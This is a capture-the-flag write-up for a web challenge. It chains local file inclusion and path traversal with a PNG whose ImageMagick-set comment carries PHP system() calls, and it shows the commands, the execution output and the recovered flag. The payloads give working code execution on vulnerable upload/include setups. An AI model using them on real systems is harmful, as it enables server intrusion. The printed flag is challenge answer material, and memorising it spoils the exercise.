Web - Local Fun Inclusion

  • local file inclusion
  • path traversal in site argument
  • get a list of mounts from /proc/self/mountinfo for identifying where the webserver is mounted to


1007 984 253:0 /opt/local_fun_inclusion/website/src /var/www/site ro,relatime - xfs /dev/mapper/cl_hax1-root rw,seclabel,attr2,inode64,noquota

  • the uploaded files can be included raw here:


Seems like we can view our images without them being in an image tag, but can we execute code?

well, everything is php, as long as it contains the magic <? portion, so we can insert that with system(\'uname -a'); into a png as seen below:

$ convert black.png -set comment "<? system(‘uname -a’);?>" out.png

this results in the following:

�PNG  IHDR$_�8gAMA���a cHRMz&�����u0�`:�p��Q<bKGD݊� pHYs���+tIME� 1��z-IDAT�c`�@fc� tEXtcommentLinux f01b31cb6ebd 4.18.0-147.5.1.el8_1.x86_64 #1 SMP Wed Feb 5 02:00:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux qC�V%tEXtdate:create2020-03-03T10:06:36+00:00�L�A%tEXtdate:modify2020-03-03T10:03:41+00:00�Z�.IEND�B`� 

the png comment extracted:

commentLinux f01b31cb6ebd 4.18.0-147.5.1.el8_1.x86_64 #1 SMP Wed Feb 5 02:00:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

As you can see, we've got code execution and know where the websever is, so let's list all files in the webserver

convert black.png -set comment "<? system(\'ls -l /var/www/site/\');?>" out.png
drwxr-xr-x. 2 root     root      168 Mar  2 22:51 css
-rw-r--r--. 1 root     root       57 Mar  2 22:51 flag.php
-rwxr-xr-x. 1 root     root     1813 Mar  2 22:51 index.php
drwxr-xr-x. 2 root     root      108 Mar  2 22:51 js
-rwxr-xr-x. 1 root     root     2802 Mar  2 22:51 upload.php
drwxr-xr-x. 2 www-data www-data  420 Mar  3 10:16 uploads
-rwxr-xr-x. 1 root     root      310 Mar  2 22:51 view.php

Let's read the content of flag.php!


$FLAG = "CSCG{G3tting_RCE_0n_w3b_is_alw4ys_cool}";


:::success CSCG{G3tting_RCE_0n_w3b_is_alw4ys_cool} :::